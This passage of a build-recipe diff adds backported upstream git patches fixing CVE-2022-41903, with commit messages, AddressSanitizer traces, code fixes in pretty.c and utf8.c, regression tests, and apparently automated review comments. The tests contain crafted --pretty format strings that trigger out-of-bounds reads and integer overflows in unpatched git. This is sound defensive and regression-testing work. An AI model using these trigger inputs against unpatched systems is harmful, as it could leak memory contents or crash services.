41 #0 0x7f2d08ebe7ea in __interceptor_realloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:85
42 #1 0x55ba6fa5b494 in xrealloc wrapper.c:136
43 #2 0x55ba6f9aefdc in strbuf_grow strbuf.c:99
44 #3 0x55ba6f9b0a06 in strbuf_add strbuf.c:298
45 #4 0x55ba6f9b1a25 in strbuf_expand strbuf.c:418
46 #5 0x55ba6f88f020 in repo_format_commit_message pretty.c:1869
47 #6 0x55ba6f890ccf in pretty_print_commit pretty.c:2161
48 #7 0x55ba6f7884c8 in show_log log-tree.c:781
49 #8 0x55ba6f78b6ba in log_tree_commit log-tree.c:1117
50 #9 0x55ba6f40fed5 in cmd_log_walk_no_free builtin/log.c:508
51 #10 0x55ba6f41035b in cmd_log_walk builtin/log.c:549
52 #11 0x55ba6f4131a2 in cmd_log builtin/log.c:883
53 #12 0x55ba6f2ea993 in run_builtin git.c:466
54 #13 0x55ba6f2eb397 in handle_builtin git.c:721
55 #14 0x55ba6f2ebb07 in run_argv git.c:788
56 #15 0x55ba6f2ec8a7 in cmd_main git.c:923
57 #16 0x55ba6f581682 in main common-main.c:57
58 #17 0x7f2d08c3c28f (/usr/lib/libc.so.6+0x2328f)
59 #18 0x7f2d08c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
60 #19 0x55ba6f2e60e4 in _start ../sysdeps/x86_64/start.S:115
61
62 SUMMARY: AddressSanitizer: heap-buffer-overflow pretty.c:1712 in format_and_pad_commit
63 Shadow bytes around the buggy address:
64 0x0c067fff8120: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
65 0x0c067fff8130: fd fd fa fa fd fd fd fd fa fa fd fd fd fa fa fa
66 0x0c067fff8140: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa
67 0x0c067fff8150: fa fa fd fd fd fd fa fa 00 00 00 fa fa fa fd fd
68 0x0c067fff8160: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa
69 =>0x0c067fff8170: fd fd fd fa fa[fa]00 00 00 fa fa fa 00 00 00 fa
70 0x0c067fff8180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
71 0x0c067fff8190: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
72 0x0c067fff81a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
73 0x0c067fff81b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
74 0x0c067fff81c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
75 Shadow byte legend (one shadow byte represents 8 application bytes):
76 Addressable: 00
77 Partially addressable: 01 02 03 04 05 06 07
78 Heap left redzone: fa
79 Freed heap region: fd
80 Stack left redzone: f1
81 Stack mid redzone: f2
82 Stack right redzone: f3
83 Stack after return: f5
84 Stack use after scope: f8
85 Global redzone: f9
86 Global init order: f6
87 Poisoned by user: f7
88 Container overflow: fc
89 Array cookie: ac
90 Intra object redzone: bb
91 ASan internal: fe
92 Left alloca redzone: ca
93 Right alloca redzone: cb
94
95Luckily enough, this would only cause us to copy the out-of-bounds data
96into the formatted commit in case we really had an ANSI sequence
97preceding our buffer. So this bug likely has no security consequences.
98
99Fix it regardless by not traversing past the buffer's start.
100
101Reported-by: Patrick Steinhardt <ps@pks.im>
102Reported-by: Eric Sesterhenn <eric.sesterhenn@x41-dsec.de>
103Signed-off-by: Patrick Steinhardt <ps@pks.im>
104Signed-off-by: Junio C Hamano <gitster@pobox.com>
105
106Upstream-Status: Backport [https://github.com/git/git/commit/b49f309aa16febeddb65e82526640a91bbba3be3]
107CVE: CVE-2022-41903
108Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
109---
110 pretty.c | 2 +-
111 t/t4205-log-pretty-formats.sh | 6 ++++++
112 2 files changed, 7 insertions(+), 1 deletion(-)
113
114diff --git a/pretty.c b/pretty.c
115index 637e344..4348a82 100644
116--- a/pretty.c
117+++ b/pretty.c
118@@ -1468,7 +1468,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
119 if (*ch != 'm')
120 break;
121 p = ch - 1;
122- while (ch - p < 10 && *p != '\033')
123+ while (p > sb->buf && ch - p < 10 && *p != '\033')
124 p--;
125 if (*p != '\033' ||
126 ch + 1 - p != display_mode_esc_sequence_len(p))
127diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
128index a2acee1..e69caba 100755
129--- a/t/t4205-log-pretty-formats.sh
130+++ b/t/t4205-log-pretty-formats.sh
131@@ -788,6 +788,12 @@ test_expect_success '%S in git log --format works with other placeholders (part
132 test_cmp expect actual
133 '
134
135+test_expect_success 'log --pretty with space stealing' '
136+ printf mm0 >expect &&
137+ git log -1 --pretty="format:mm%>>|(1)%x30" >actual &&
138+ test_cmp expect actual
139+'
140+
141 test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
142 # We only assert that this command does not crash. This needs to be
143 # executed with the address sanitizer to demonstrate failure.
144--
1452.25.1
146
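Review bot: The `*p` read in `if (*p != '\033' ||` directly after the patched loop still depends on `p = ch - 1` pointing inside the buffer, which the added `p > sb->buf` test does not cover if `ch` equals `sb->buf`. The enclosing loop starts outside the hunk, so its condition on `ch` is not visible here; if it already keeps `ch > sb->buf`, the change is complete. Either way the bound deserves a comment on the loop, for example `/* never step back past sb->buf while looking for ESC */`. The added test compares only the output `mm0`, and the patch description says the failure shows up under `SANITIZE=address`, so a non-sanitized test run is unlikely to catch a regression.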
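--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-04.patch
@@ -0,0 +1,150 @@
+From f6e0b9f38987ad5e47bab551f8760b70689a5905 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:34 +0100
+Subject: [PATCH 04/12] pretty: fix out-of-bounds read when parsing invalid padding format
+
+An out-of-bounds read can be triggered when parsing an incomplete
+padding format string passed via `--pretty=format` or in Git archives
+when files are marked with the `export-subst` gitattribute.
+
+This bug exists since we have introduced support for truncating output
+via the `trunc` keyword a7f01c6 (pretty: support truncating in %>, %<
+and %><, 2013-04-19). Before this commit, we used to find the end of the
+formatting string by using strchr(3P). This function returns a `NULL`
+pointer in case the character in question wasn't found. The subsequent
+check whether any character was found thus simply checked the returned
+pointer. After the commit we switched to strcspn(3P) though, which only
+returns the offset to the first found character or to the trailing NUL
+byte. As the end pointer is now computed by adding the offset to the
+start pointer it won't be `NULL` anymore, and as a consequence the check
+doesn't do anything anymore.
+
+The out-of-bounds data that is being read can in fact end up in the
+formatted string. As a consequence, it is possible to leak memory
+contents either by calling git-log(1) or via git-archive(1) when any of
+the archived files is marked with the `export-subst` gitattribute.
+
+ ==10888==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000398 at pc 0x7f0356047cb2 bp 0x7fff3ffb95d0 sp 0x7fff3ffb8d78
+ READ of size 1 at 0x602000000398 thread T0
+ #0 0x7f0356047cb1 in __interceptor_strchrnul /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:725
+ #1 0x563b7cec9a43 in strbuf_expand strbuf.c:417
+ #2 0x563b7cda7060 in repo_format_commit_message pretty.c:1869
+ #3 0x563b7cda8d0f in pretty_print_commit pretty.c:2161
+ #4 0x563b7cca04c8 in show_log log-tree.c:781
+ #5 0x563b7cca36ba in log_tree_commit log-tree.c:1117
+ #6 0x563b7c927ed5 in cmd_log_walk_no_free builtin/log.c:508
+ #7 0x563b7c92835b in cmd_log_walk builtin/log.c:549
+ #8 0x563b7c92b1a2 in cmd_log builtin/log.c:883
+ #9 0x563b7c802993 in run_builtin git.c:466
+ #10 0x563b7c803397 in handle_builtin git.c:721
+ #11 0x563b7c803b07 in run_argv git.c:788
+ #12 0x563b7c8048a7 in cmd_main git.c:923
+ #13 0x563b7ca99682 in main common-main.c:57
+ #14 0x7f0355e3c28f (/usr/lib/libc.so.6+0x2328f)
+ #15 0x7f0355e3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #16 0x563b7c7fe0e4 in _start ../sysdeps/x86_64/start.S:115
+
+ 0x602000000398 is located 0 bytes to the right of 8-byte region [0x602000000390,0x602000000398)
+ allocated by thread T0 here:
+ #0 0x7f0356072faa in __interceptor_strdup /usr/src/debug/gcc/libsanitizer/asan/asan_interceptors.cpp:439
+ #1 0x563b7cf7317c in xstrdup wrapper.c:39
+ #2 0x563b7cd9a06a in save_user_format pretty.c:40
+ #3 0x563b7cd9b3e5 in get_commit_format pretty.c:173
+ #4 0x563b7ce54ea0 in handle_revision_opt revision.c:2456
+ #5 0x563b7ce597c9 in setup_revisions revision.c:2850
+ #6 0x563b7c9269e0 in cmd_log_init_finish builtin/log.c:269
+ #7 0x563b7c927362 in cmd_log_init builtin/log.c:348
+ #8 0x563b7c92b193 in cmd_log builtin/log.c:882
+ #9 0x563b7c802993 in run_builtin git.c:466
+ #10 0x563b7c803397 in handle_builtin git.c:721
+ #11 0x563b7c803b07 in run_argv git.c:788
+ #12 0x563b7c8048a7 in cmd_main git.c:923
+ #13 0x563b7ca99682 in main common-main.c:57
+ #14 0x7f0355e3c28f (/usr/lib/libc.so.6+0x2328f)
+ #15 0x7f0355e3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #16 0x563b7c7fe0e4 in _start ../sysdeps/x86_64/start.S:115
+
+ SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:725 in __interceptor_strchrnul
+ Shadow bytes around the buggy address:
+ 0x0c047fff8020: fa fa fd fd fa fa 00 06 fa fa 05 fa fa fa fd fd
+ 0x0c047fff8030: fa fa 00 02 fa fa 06 fa fa fa 05 fa fa fa fd fd
+ 0x0c047fff8040: fa fa 00 07 fa fa 03 fa fa fa fd fd fa fa 00 00
+ 0x0c047fff8050: fa fa 00 01 fa fa fd fd fa fa 00 00 fa fa 00 01
+ 0x0c047fff8060: fa fa 00 06 fa fa 00 06 fa fa 05 fa fa fa 05 fa
+ =>0x0c047fff8070: fa fa 00[fa]fa fa fd fa fa fa fd fd fa fa fd fd
+ 0x0c047fff8080: fa fa fd fd fa fa 00 00 fa fa 00 fa fa fa fd fa
+ 0x0c047fff8090: fa fa fd fd fa fa 00 00 fa fa fa fa fa fa fa fa
+ 0x0c047fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c047fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c047fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+ ==10888==ABORTING
+
+Fix this bug by checking whether `end` points at the trailing NUL byte.
+Add a test which catches this out-of-bounds read and which demonstrates
+that we used to write out-of-bounds data into the formatted message.
+
+Reported-by: Markus Vervier <markus.vervier@x41-dsec.de>
+Original-patch-by: Markus Vervier <markus.vervier@x41-dsec.de>
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/f6e0b9f38987ad5e47bab551f8760b70689a5905]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ pretty.c | 2 +-
+ t/t4205-log-pretty-formats.sh | 6 ++++++
+ 2 files changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/pretty.c b/pretty.c
+index 4348a82..c49e818 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -1024,7 +1024,7 @@ static size_t parse_padding_placeholder(const char *placeholder,
+ const char *end = start + strcspn(start, ",)");
+ char *next;
+ int width;
+- if (!end || end == start)
++ if (!*end || end == start)
+ return 0;
+ width = strtol(start, &next, 10);
+ if (next == start || width == 0)
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index e69caba..8a349df 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -794,6 +794,12 @@ test_expect_success 'log --pretty with space stealing' '
+ test_cmp expect actual
+ '
+
++test_expect_success 'log --pretty with invalid padding format' '
++ printf "%s%%<(20" "$(git rev-parse HEAD)" >expect &&
++ git log -1 --pretty="format:%H%<(20" >actual &&
++ test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ # We only assert that this command does not crash. This needs to be
+ # executed with the address sanitizer to demonstrate failure.
+--
+2.25.1
+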
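Review bot: The corrected guard in parse_padding_placeholder(), `if (!*end || end == start)`, is easy to misread as a typo of the old NULL test, so it deserves a comment at that line. Something like `/* strcspn() never yields NULL: a missing ',' or ')' leaves end on the trailing NUL */` would record why the dereference is the real check. The function starts and ends outside the hunk, so the rest of the placeholder parsing is not reviewed here.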
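--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-05.patch
@@ -0,0 +1,98 @@
+From 1de69c0cdd388b0a5b7bdde0bfa0bda514a354b0 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:39 +0100
+Subject: [PATCH 05/12] pretty: fix adding linefeed when placeholder is not expanded
+
+When a formatting directive has a `+` or ` ` after the `%`, then we add
+either a line feed or space if the placeholder expands to a non-empty
+string. In specific cases though this logic doesn't work as expected,
+and we try to add the character even in the case where the formatting
+directive is empty.
+
+One such pattern is `%w(1)%+d%+w(2)`. `%+d` expands to reference names
+pointing to a certain commit, like in `git log --decorate`. For a tagged
+commit this would for example expand to `\n (tag: v1.0.0)`, which has a
+leading newline due to the `+` modifier and a space added by `%d`. Now
+the second wrapping directive will cause us to rewrap the text to
+`\n(tag:\nv1.0.0)`, which is one byte shorter due to the missing leading
+space. The code that handles the `+` magic now notices that the length
+has changed and will thus try to insert a leading line feed at the
+original posititon. But as the string was shortened, the original
+position is past the buffer's boundary and thus we die with an error.
+
+Now there are two issues here:
+
+ 1. We check whether the buffer length has changed, not whether it
+ has been extended. This causes us to try and add the character
+ past the string boundary.
+
+ 2. The current logic does not make any sense whatsoever. When the
+ string got expanded due to the rewrap, putting the separator into
+ the original position is likely to put it somewhere into the
+ middle of the rewrapped contents.
+
+It is debatable whether `%+w()` makes any sense in the first place.
+Strictly speaking, the placeholder never expands to a non-empty string,
+and consequentially we shouldn't ever accept this combination. We thus
+fix the bug by simply refusing `%+w()`.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/1de69c0cdd388b0a5b7bdde0bfa0bda514a354b0]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ pretty.c | 14 +++++++++++++-
+ t/t4205-log-pretty-formats.sh | 8 ++++++++
+ 2 files changed, 21 insertions(+), 1 deletion(-)
+
+diff --git a/pretty.c b/pretty.c
+index c49e818..195d005 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -1551,9 +1551,21 @@ static size_t format_commit_item(struct strbuf *sb, /* in UTF-8 */
+ default:
+ break;
+ }
+- if (magic != NO_MAGIC)
++ if (magic != NO_MAGIC) {
+ placeholder++;
+
++ switch (placeholder[0]) {
++ case 'w':
++ /*
++ * `%+w()` cannot ever expand to a non-empty string,
++ * and it potentially changes the layout of preceding
++ * contents. We're thus not able to handle the magic in
++ * this combination and refuse the pattern.
++ */
++ return 0;
++ };
++ }
++
+ orig_len = sb->len;
+ if (((struct format_commit_context *)context)->flush_type != no_flush)
+ consumed = format_and_pad_commit(sb, placeholder, context);
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index 8a349df..fa1bc2b 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -800,6 +800,14 @@ test_expect_success 'log --pretty with invalid padding format' '
+ test_cmp expect actual
+ '
+
++test_expect_success 'log --pretty with magical wrapping directives' '
++ commit_id=$(git commit-tree HEAD^{tree} -m "describe me") &&
++ git tag describe-me $commit_id &&
++ printf "\n(tag:\ndescribe-me)%%+w(2)" >expect &&
++ git log -1 --pretty="format:%w(1)%+d%+w(2)" $commit_id >actual &&
++ test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ # We only assert that this command does not crash. This needs to be
+ # executed with the address sanitizer to demonstrate failure.
+--
+2.25.1
+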
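Review bot: The block added after `placeholder++` in format_commit_item() is a one-case `switch` closed with `};`, which leaves a stray empty statement; `if (placeholder[0] == 'w') return 0;` under the same comment would say the same thing more directly. The text matches the upstream commit named in Upstream-Status, so keeping it verbatim in the backport is reasonable and the cleanup is better proposed upstream. The function continues outside the hunk, so the length comparison that the commit message describes as the first issue is not visible here and appears to be left unchanged.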
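--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-06.patch
@@ -0,0 +1,90 @@
+From 48050c42c73c28b0c001d63d11dffac7e116847b Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:49 +0100
+Subject: [PATCH 06/12] pretty: fix integer overflow in wrapping format
+
+The `%w(width,indent1,indent2)` formatting directive can be used to
+rewrap text to a specific width and is designed after git-shortlog(1)'s
+`-w` parameter. While the three parameters are all stored as `size_t`
+internally, `strbuf_add_wrapped_text()` accepts integers as input. As a
+result, the casted integers may overflow. As these now-negative integers
+are later on passed to `strbuf_addchars()`, we will ultimately run into
+implementation-defined behaviour due to casting a negative number back
+to `size_t` again. On my platform, this results in trying to allocate
+9000 petabyte of memory.
+
+Fix this overflow by using `cast_size_t_to_int()` so that we reject
+inputs that cannot be represented as an integer.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/48050c42c73c28b0c001d63d11dffac7e116847b]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ git-compat-util.h | 8 ++++++++
+ pretty.c | 4 +++-
+ t/t4205-log-pretty-formats.sh | 12 ++++++++++++
+ 3 files changed, 23 insertions(+), 1 deletion(-)
+
+diff --git a/git-compat-util.h b/git-compat-util.h
+index a1ecfd3..b0f3890 100644
+--- a/git-compat-util.h
++++ b/git-compat-util.h
+@@ -854,6 +854,14 @@ static inline size_t st_sub(size_t a, size_t b)
+ return a - b;
+ }
+
++static inline int cast_size_t_to_int(size_t a)
++{
++ if (a > INT_MAX)
++ die("number too large to represent as int on this platform: %"PRIuMAX,
++ (uintmax_t)a);
++ return (int)a;
++}
++
+ #ifdef HAVE_ALLOCA_H
+ # include <alloca.h>
+ # define xalloca(size) (alloca(size))
+diff --git a/pretty.c b/pretty.c
+index 195d005..ff9fc97 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -898,7 +898,9 @@ static void strbuf_wrap(struct strbuf *sb, size_t pos,
+ if (pos)
+ strbuf_add(&tmp, sb->buf, pos);
+ strbuf_add_wrapped_text(&tmp, sb->buf + pos,
+- (int) indent1, (int) indent2, (int) width);
++ cast_size_t_to_int(indent1),
++ cast_size_t_to_int(indent2),
++ cast_size_t_to_int(width));
+ strbuf_swap(&tmp, sb);
+ strbuf_release(&tmp);
+ }
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index fa1bc2b..23ac508 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -808,6 +808,18 @@ test_expect_success 'log --pretty with magical wrapping directives' '
+ test_cmp expect actual
+ '
+
++test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing wrapping directive' '
++ cat >expect <<-EOF &&
++ fatal: number too large to represent as int on this platform: 2147483649
++ EOF
++ test_must_fail git log -1 --pretty="format:%w(2147483649,1,1)%d" 2>error &&
++ test_cmp expect error &&
++ test_must_fail git log -1 --pretty="format:%w(1,2147483649,1)%d" 2>error &&
++ test_cmp expect error &&
++ test_must_fail git log -1 --pretty="format:%w(1,1,2147483649)%d" 2>error &&
++ test_cmp expect error
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ # We only assert that this command does not crash. This needs to be
+ # executed with the address sanitizer to demonstrate failure.
+--
+2.25.1
+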
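Review bot: `cast_size_t_to_int()` in git-compat-util.h has no comment saying that it terminates the process rather than truncating, which is the one thing every caller needs to know. A line such as `/* Narrow size_t to int; die()s if the value exceeds INT_MAX. */` above the definition would cover it. The three call sites in strbuf_wrap() then read correctly as a hard rejection of oversized `%w()` arguments, which is what the new test asserts.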
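--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-07.patch
@@ -0,0 +1,123 @@
+From 522cc87fdc25449222a5894a428eebf4b8d5eaa9 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:53 +0100
+Subject: [PATCH 07/12] utf8: fix truncated string lengths in utf8_strnwidth()
+
+The `utf8_strnwidth()` function accepts an optional string length as
+input parameter. This parameter can either be set to `-1`, in which case
+we call `strlen()` on the input. Or it can be set to a positive integer
+that indicates a precomputed length, which callers typically compute by
+calling `strlen()` at some point themselves.
+
+The input parameter is an `int` though, whereas `strlen()` returns a
+`size_t`. This can lead to implementation-defined behaviour though when
+the `size_t` cannot be represented by the `int`. In the general case
+though this leads to wrap-around and thus to negative string sizes,
+which is sure enough to not lead to well-defined behaviour.
+
+Fix this by accepting a `size_t` instead of an `int` as string length.
+While this takes away the ability of callers to simply pass in `-1` as
+string length, it really is trivial enough to convert them to instead
+pass in `strlen()` instead.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/522cc87fdc25449222a5894a428eebf4b8d5eaa9]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ column.c | 2 +-
+ pretty.c | 4 ++--
+ utf8.c | 8 +++-----
+ utf8.h | 2 +-
+ 4 files changed, 7 insertions(+), 9 deletions(-)
+
+diff --git a/column.c b/column.c
+index 4a38eed..0c79850 100644
+--- a/column.c
++++ b/column.c
+@@ -23,7 +23,7 @@ struct column_data {
+ /* return length of 's' in letters, ANSI escapes stripped */
+ static int item_length(const char *s)
+ {
+- return utf8_strnwidth(s, -1, 1);
++ return utf8_strnwidth(s, strlen(s), 1);
+ }
+
+ /*
+diff --git a/pretty.c b/pretty.c
+index ff9fc97..c3c1443 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -1437,7 +1437,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ int occupied;
+ if (!start)
+ start = sb->buf;
+- occupied = utf8_strnwidth(start, -1, 1);
++ occupied = utf8_strnwidth(start, strlen(start), 1);
+ occupied += c->pretty_ctx->graph_width;
+ padding = (-padding) - occupied;
+ }
+@@ -1455,7 +1455,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ placeholder++;
+ total_consumed++;
+ }
+- len = utf8_strnwidth(local_sb.buf, -1, 1);
++ len = utf8_strnwidth(local_sb.buf, local_sb.len, 1);
+
+ if (c->flush_type == flush_left_and_steal) {
+ const char *ch = sb->buf + sb->len - 1;
+diff --git a/utf8.c b/utf8.c
+index 5c8f151..a66984b 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -206,13 +206,11 @@ int utf8_width(const char **start, size_t *remainder_p)
+ * string, assuming that the string is utf8. Returns strlen() instead
+ * if the string does not look like a valid utf8 string.
+ */
+-int utf8_strnwidth(const char *string, int len, int skip_ansi)
++int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
+ {
+ int width = 0;
+ const char *orig = string;
+
+- if (len == -1)
+- len = strlen(string);
+ while (string && string < orig + len) {
+ int skip;
+ while (skip_ansi &&
+@@ -225,7 +223,7 @@ int utf8_strnwidth(const char *string, int len, int skip_ansi)
+
+ int utf8_strwidth(const char *string)
+ {
+- return utf8_strnwidth(string, -1, 0);
++ return utf8_strnwidth(string, strlen(string), 0);
+ }
+
+ int is_utf8(const char *text)
+@@ -792,7 +790,7 @@ int skip_utf8_bom(char **text, size_t len)
+ void strbuf_utf8_align(struct strbuf *buf, align_type position, unsigned int width,
+ const char *s)
+ {
+- int slen = strlen(s);
++ size_t slen = strlen(s);
+ int display_len = utf8_strnwidth(s, slen, 0);
+ int utf8_compensation = slen - display_len;
+
+diff --git a/utf8.h b/utf8.h
+index fcd5167..6da1b6d 100644
+--- a/utf8.h
++++ b/utf8.h
+@@ -7,7 +7,7 @@ typedef unsigned int ucs_char_t; /* assuming 32bit int */
+
+ size_t display_mode_esc_sequence_len(const char *s);
+ int utf8_width(const char **start, size_t *remainder_p);
+-int utf8_strnwidth(const char *string, int len, int skip_ansi);
++int utf8_strnwidth(const char *string, size_t len, int skip_ansi);
+ int utf8_strwidth(const char *string);
+ int is_utf8(const char *text);
+ int is_encoding_utf8(const char *name);
+--
+2.25.1
+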
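Review bot: Changing the `len` parameter of utf8_strnwidth() to `size_t` silently turns any remaining `-1` argument into SIZE_MAX, and without `-Wsign-conversion` the compiler will not flag it. The hunks convert the callers in column.c, pretty.c and utf8.c, but this is a backport, so the target tree should be searched for other `utf8_strnwidth(` call sites that still pass `-1`; it may differ from the tree the upstream patch was written against. In strbuf_utf8_align(), `int utf8_compensation = slen - display_len;` now narrows a `size_t` expression to `int`, which the hunk leaves as is.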
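--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-08.patch
@@ -0,0 +1,67 @@
+From 17d23e8a3812a5ca3dd6564e74d5250f22e5d76d Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:00 +0100
+Subject: [PATCH 08/12] utf8: fix returning negative string width
+
+The `utf8_strnwidth()` function calls `utf8_width()` in a loop and adds
+its returned width to the end result. `utf8_width()` can return `-1`
+though in case it reads a control character, which means that the
+computed string width is going to be wrong. In the worst case where
+there are more control characters than non-control characters, we may
+even return a negative string width.
+
+Fix this bug by treating control characters as having zero width.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/17d23e8a3812a5ca3dd6564e74d5250f22e5d76d]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/t4205-log-pretty-formats.sh | 6 ++++++
+ utf8.c | 8 ++++++--
+ 2 files changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index 23ac508..261a6f0 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -820,6 +820,12 @@ test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing wrapping dire
+ test_cmp expect error
+ '
+
++test_expect_success 'log --pretty with padding and preceding control chars' '
++ printf "\20\20 0" >expect &&
++ git log -1 --pretty="format:%x10%x10%>|(4)%x30" >actual &&
++ test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ # We only assert that this command does not crash. This needs to be
+ # executed with the address sanitizer to demonstrate failure.
+diff --git a/utf8.c b/utf8.c
+index a66984b..6632bd2 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -212,11 +212,15 @@ int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
+ const char *orig = string;
+
+ while (string && string < orig + len) {
+- int skip;
++ int glyph_width, skip;
++
+ while (skip_ansi &&
+ (skip = display_mode_esc_sequence_len(string)) != 0)
+ string += skip;
+- width += utf8_width(&string, NULL);
++
++ glyph_width = utf8_width(&string, NULL);
++ if (glyph_width > 0)
++ width += glyph_width;
+ }
+ return string ? width : len;
+ }
+--
+2.25.1
+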
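Review bot: The new `if (glyph_width > 0)` test in utf8_strnwidth() carries no explanation, and the hunk does not touch the comment above the function, so the rule that control characters count as zero width is recorded only in the commit message. Adding `/* utf8_width() returns -1 for control characters; count them as zero width */` above that test would keep the reason next to the code. The start of the function is outside this hunk.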
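--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-09.patch
@@ -0,0 +1,162 @@
+From 937b71cc8b5b998963a7f9a33312ba3549d55510 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:04 +0100
+Subject: [PATCH 09/12] utf8: fix overflow when returning string width
+
+The return type of both `utf8_strwidth()` and `utf8_strnwidth()` is
+`int`, but we operate on string lengths which are typically of type
+`size_t`. This means that when the string is longer than `INT_MAX`, we
+will overflow and thus return a negative result.
+
+This can lead to an out-of-bounds write with `--pretty=format:%<1)%B`
+and a commit message that is 2^31+1 bytes long:
+
+ =================================================================
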